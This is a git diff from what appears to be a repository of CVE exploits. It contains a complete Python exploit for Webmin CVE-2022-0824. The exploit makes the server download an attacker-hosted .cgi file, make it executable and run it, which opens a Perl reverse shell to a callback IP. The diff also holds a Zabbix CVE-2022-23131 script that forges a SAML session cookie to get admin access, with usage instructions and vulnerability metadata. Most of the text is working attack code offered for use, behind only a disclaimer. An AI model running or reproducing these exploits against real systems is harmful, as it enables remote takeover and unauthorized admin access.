Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured. +_Source: https://www.webmin.com/security.html_ + +## Exploit Description + +This exploit takes advantage of the post-auth Improper Access Control vulnerability in File Manager. This exploit could be done by any less privileged authenticated attacker. It will download a .cgi file remotely from an attacker-controlled server and modify its permission to be a world-executables file. Once this is done, it will execute the .cgi file to establish a reverse connection to the attacker-controller server with root privileges. + +_Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/_ + +## Usage + + $~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT] + $~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444 + + $~ python3 Webmin-revshell.py -h + usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V] + + Webmin CVE-2022-0824 Reverse Shell + + optional arguments: + -h, --help show this help message and exit + -t TARGET, --target TARGET + Target full URL, https://www.webmin.local:10000 + -c CREDENTIAL, --credential CREDENTIAL + Format, user:user123 + -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER + Http server for serving payload, ex 192.168.5.120:8080 + -L CALLBACK_IP, --callback_ip CALLBACK_IP + Callback IP to receive revshell + -P CALLBACK_PORT, --callback_port CALLBACK_PORT + Callback port to receive revshell + -V, --version show program's version number and exit + +## PoC + + target host: https://192.168.5.118:10000 + attacker host: 192.168.5.120 + + +https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4 + + +## Tested on + + - Webmin 1.984 + - Ubuntu 18.04 + - Kali 2021.3 + + +## Disclaimer: + + The 
script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities
diff --git a/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py b/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py
old mode 100755
new mode 100644
index 2f27a1d29ae89371cf6f3294ccb23851329fe0f9..cde6a67e97a806c0327e82e28301e801f934f3e6
--- a/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py
+++ b/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py
@@ -1,146 +1,146 @@ -#!/usr/bin/python3 - -""" -Coded by: @faisalfs10x -GitHub: https://github.com/faisalfs10x -Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ -""" - -import requests -import urllib3 -import argparse -import os -import time - -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) - -TGREEN = '\033[32m' -TRED = '\033[31m' -TCYAN = '\033[36m' -TSHELL = '\033[32;1m' -ENDC = '\033[m' - -class Exploit(object): - def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): - self.target = target - self.username = username - self.password = password - self.py3http_server = py3http_server - self.pyhttp_port = pyhttp_port - self.upload_path = upload_path - self.callback_ip = callback_ip - self.callback_port = callback_port - self.fname = fname - - #self.proxies = proxies - self.s = requests.Session() - - - def gen_payload(self): - payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') - print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) - f = open(f"{self.fname}", "w") - f.write(payload) - f.close() - - def login(self): - login_url = self.target + "/session_login.cgi" - cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } - - data = { 'user' : self.username, 'pass' : self.password } - try: - r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) - success_message = 'System hostname' - if success_message in r.text: - print(TGREEN + "[+] Login Successful", ENDC) - else: - print(TRED +"[-] Login Failed", ENDC) - exit() - - except requests.Timeout as e: - print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", 
ENDC) - exit() - - def pyhttp_server(self): - print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') - os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up - print('[+] Sleep 3 second to ensure http server is up!') - time.sleep(3) # Sleep for 5 seconds to ensure http server is up! - - def download_remote_url(self): - download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" - headers = { - "Accept": "application/json, text/javascript, */*; q=0.01", - "Accept-Encoding": "gzip, deflate", - "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", - "X-Requested-With": "XMLHttpRequest", - "Referer": self.target + "/filemin/?xnavigation=1" - } - - data = { - 'link': "http://" + self.py3http_server + "/" + self.fname, - 'username': '', - 'password': '', - 'path': self.upload_path - } - - r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) - print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") - - def modify_permission(self): - modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" - headers = { "Referer": self.target + "/filemin/?xnavigation=1" } - data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } - - r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) - print(f"[+] Modifying permission of {self.fname} to 0755") - - def exec_revshell(self): - url = self.target + '/' + self.fname - try: - r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) - except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! 
- print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) - print("[+] Shell location: " + url) - else: - print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) - - def do_cleanup(self): - print(TCYAN + '\n[+] Cleaning up ') - print(f'[+] Killing: http.server on port {self.pyhttp_port}') - os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') - exit() - - def run(self): - self.gen_payload() - self.login() - self.pyhttp_server() - self.download_remote_url() - self.modify_permission() - self.exec_revshell() - self.do_cleanup() - - -if __name__ == "__main__": - - parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') - parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') - parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') - parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') - parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') - parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') - parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') - args = parser.parse_args() - - target = args.target - username = args.credential.split(':')[0] - password = args.credential.split(':')[1] - py3http_server = args.py3http_server - pyhttp_port = py3http_server.split(':')[1] - callback_ip = args.callback_ip - callback_port = args.callback_port - upload_path = "/usr/share/webmin" - fname = "revshell.cgi" - - pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) +#!/usr/bin/python3 + +""" +Coded by: @faisalfs10x +GitHub: https://github.com/faisalfs10x 
+Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ +""" + +import requests +import urllib3 +import argparse +import os +import time + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +TGREEN = '\033[32m' +TRED = '\033[31m' +TCYAN = '\033[36m' +TSHELL = '\033[32;1m' +ENDC = '\033[m' + +class Exploit(object): + def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): + self.target = target + self.username = username + self.password = password + self.py3http_server = py3http_server + self.pyhttp_port = pyhttp_port + self.upload_path = upload_path + self.callback_ip = callback_ip + self.callback_port = callback_port + self.fname = fname + + #self.proxies = proxies + self.s = requests.Session() + + + def gen_payload(self): + payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') + print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) + f = open(f"{self.fname}", "w") + f.write(payload) + f.close() + + def login(self): + login_url = self.target + "/session_login.cgi" + cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } + + data = { 'user' : self.username, 'pass' : self.password } + try: + r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) + success_message = 'System hostname' + if success_message in r.text: + print(TGREEN + "[+] Login Successful", ENDC) + else: + print(TRED +"[-] Login Failed", ENDC) + exit() + + except requests.Timeout as e: + print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC) + exit() + + def pyhttp_server(self): + print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') + 
os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up + print('[+] Sleep 3 second to ensure http server is up!') + time.sleep(3) # Sleep for 5 seconds to ensure http server is up! + + def download_remote_url(self): + download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" + headers = { + "Accept": "application/json, text/javascript, */*; q=0.01", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "X-Requested-With": "XMLHttpRequest", + "Referer": self.target + "/filemin/?xnavigation=1" + } + + data = { + 'link': "http://" + self.py3http_server + "/" + self.fname, + 'username': '', + 'password': '', + 'path': self.upload_path + } + + r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) + print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") + + def modify_permission(self): + modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" + headers = { "Referer": self.target + "/filemin/?xnavigation=1" } + data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } + + r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) + print(f"[+] Modifying permission of {self.fname} to 0755") + + def exec_revshell(self): + url = self.target + '/' + self.fname + try: + r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) + except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! 
+ print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) + print("[+] Shell location: " + url) + else: + print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) + + def do_cleanup(self): + print(TCYAN + '\n[+] Cleaning up ') + print(f'[+] Killing: http.server on port {self.pyhttp_port}') + os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') + exit() + + def run(self): + self.gen_payload() + self.login() + self.pyhttp_server() + self.download_remote_url() + self.modify_permission() + self.exec_revshell() + self.do_cleanup() + + +if __name__ == "__main__": + + parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') + parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') + parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') + parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') + parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') + parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') + parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') + args = parser.parse_args() + + target = args.target + username = args.credential.split(':')[0] + password = args.credential.split(':')[1] + py3http_server = args.py3http_server + pyhttp_port = py3http_server.split(':')[1] + callback_ip = args.callback_ip + callback_port = args.callback_port + upload_path = "/usr/share/webmin" + fname = "revshell.cgi" + + pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) pwn.run() \ No newline at end of file 
diff --git a/cve/webmin/2022/yaml/CVE-2022-0824.yaml b/cve/webmin/2022/yaml/CVE-2022-0824.yaml
old mode 100755
new mode 100644
index 759b4b56d2e3b427d23e98bc4c467d5c9686871a..691f234fc94f1e9417479a1d0e52f124779f2af3
--- a/cve/webmin/2022/yaml/CVE-2022-0824.yaml
+++ b/cve/webmin/2022/yaml/CVE-2022-0824.yaml
@@ -1,20 +1,20 @@
-id: CVE-2022-0824
-source: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell
-info:
- name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。
- severity: high
- description: |
- 在GitHub仓库webmin/webmin 1.990之前,访问控制不当导致远程代码执行。
- scope-of-influence:
- webmin < 1.990
- reference:
- - https://nvd.nist.gov/vuln/detail/cve-2022-0824
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cve-id: CVE-2022-0824
- cwe-id: CWE-863, CWE-284
- cnvd-id: None
- kve-id: None
- tags: cve2022, RCE
+id: CVE-2022-0824
+source: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell
+info:
+ name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。
+ severity: high
+ description: |
+ 在GitHub仓库webmin/webmin 1.990之前,访问控制不当导致远程代码执行。
+ scope-of-influence:
+ webmin < 1.990
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2022-0824
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2022-0824
+ cwe-id: CWE-863, CWE-284
+ cnvd-id: None
+ kve-id: None
+ tags: cve2022, RCE
\ No newline at end of file
diff --git a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py
index 881c7d68b81161bb0d8019c5d8808a25e8231542..93756db10de5fb6382dfb3a2205233936c1fe6c8 100644
--- a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py
+++ b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py
@@ -1,37 +1,37 @@
-import requests
-import re
-import urllib.parse
-import base64
-import json
-import sys
-
-def exp(target, username):
- resp = requests.get(url=target, verify=False)
- cookie = resp.headers.get("Set-Cookie")
-
- zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)
-
- url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
- base64_decode_data = base64.b64decode(url_decode_data)
-
- decode_to_str = str(base64_decode_data, encoding='utf-8')
-
- to_json = json.loads(decode_to_str)
-
- tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])
-
- payloadJson = json.dumps(tmp_ojb)
- print("decode_payload:", payloadJson)
-
- payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
- print("zbx_signed_session:", payload)
-
-
-if __name__ == "__main__":
- if len(sys.argv) != 3:
- print("argv error")
- exit(0)
- target = sys.argv[1]
- username = sys.argv[2]
-
+import requests
+import re
+import urllib.parse
+import base64
+import json
+import sys
+
+def exp(target, username):
+ resp = requests.get(url=target, verify=False)
+ cookie = resp.headers.get("Set-Cookie")
+
+ zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)
+
+ url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
+ base64_decode_data = base64.b64decode(url_decode_data)
+
+ decode_to_str = str(base64_decode_data, encoding='utf-8')
+
+ to_json = json.loads(decode_to_str)
+
+ tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])
+
+ payloadJson = json.dumps(tmp_ojb)
+ print("decode_payload:", payloadJson)
+
+ payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
+ print("zbx_signed_session:", payload)
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 3:
+ print("argv error")
+ exit(0)
+ target = sys.argv[1]
+ username = sys.argv[2]
+
 exp(target, username)
\ No newline at end of file
diff --git a/cve/zabbix/2022/CVE-2022-23131/README.md b/cve/zabbix/2022/CVE-2022-23131/README.md
index bd13b10a9cf767ecd0547743377efcdb764b7310..4fabab8c1f5d7e96704ec250df0abac6269b43ae 100644
--- a/cve/zabbix/2022/CVE-2022-23131/README.md
+++ b/cve/zabbix/2022/CVE-2022-23131/README.md
@@ -1,4 +1,4 @@
-CVE-2022-23131
-使用方式:python3 CVE-2022-23131.py target Admin
-其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面
-
+CVE-2022-23131
+使用方式:python3 CVE-2022-23131.py target Admin
+其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面
+
diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
deleted file mode 100644
index 0eab256c4dfe862200d680cff85dda2a1537ef4e..0000000000000000000000000000000000000000
--- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: CVE-2022-23131
-source:
- https://github.com/L0ading-x/cve-2022-23131
-info:
- name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
- severity: critical
- description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
- scope-of-influence:
- Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- - https://www.secpulse.com/archives/179601.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-23131
- cwe-id: CWE-290
- cnvd-id: None
- kve-id: None
- tags: 前端认证绕过漏洞
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index fc7663c89bd57e1472b6072d7ca583e1c6d5cb50..226fdef942597c06e165248ec87720bc4e9c2359 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -29,6 +29,8 @@ cve:
 - CVE-2021-1056
 java-spring-cloud-gateway:
 - CVE-2022-22947
+ java-spring-security:
+ - CVE-2022-22978
 apache-commons-text:
 - CVE-2022-42889
 unzip: